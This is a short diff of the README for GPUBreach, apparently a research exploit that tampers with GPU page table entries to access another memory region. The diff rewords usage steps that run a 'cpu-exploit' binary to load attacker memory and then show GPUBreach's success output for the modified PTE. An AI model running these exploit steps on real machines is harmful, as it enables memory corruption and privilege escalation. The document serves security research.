bane-stealthium/gpubreach/README.md

 Press Enter Key to start finding and modifying that page's PTE.
 ```

+**Next, we locate the PTE that we need to tamper to access the IOVA.**

-**On another terminal**, please execute the following which first loads the attacker memory with `0x6464646464646464`:
+**On a second terminal**, please execute the following which first loads the attacker memory with `0x6464646464646464`:
 ```bash
 $ cd ./d2h-tools
 $ ./cpu-exploit/cpu-exploit ./d_pattern.bin
 ```

-Once the terminal appears, it means the data has been loaded.
-Now go back to GPUBreach’s terminal and **Press Enter Key**.
+Once this creates a new terminal, it means the data has been loaded.
+Now go back to GPUBreach’s terminal (first terminal) and **Press Enter Key**.
 On success, GPUBreach will print the text below:
 ```text
 Found its PTE, modified your pointer's PTE to point to: 0x060000000fff0005 Press Enter Key if you want to write 0x060000000ffe0005 instead.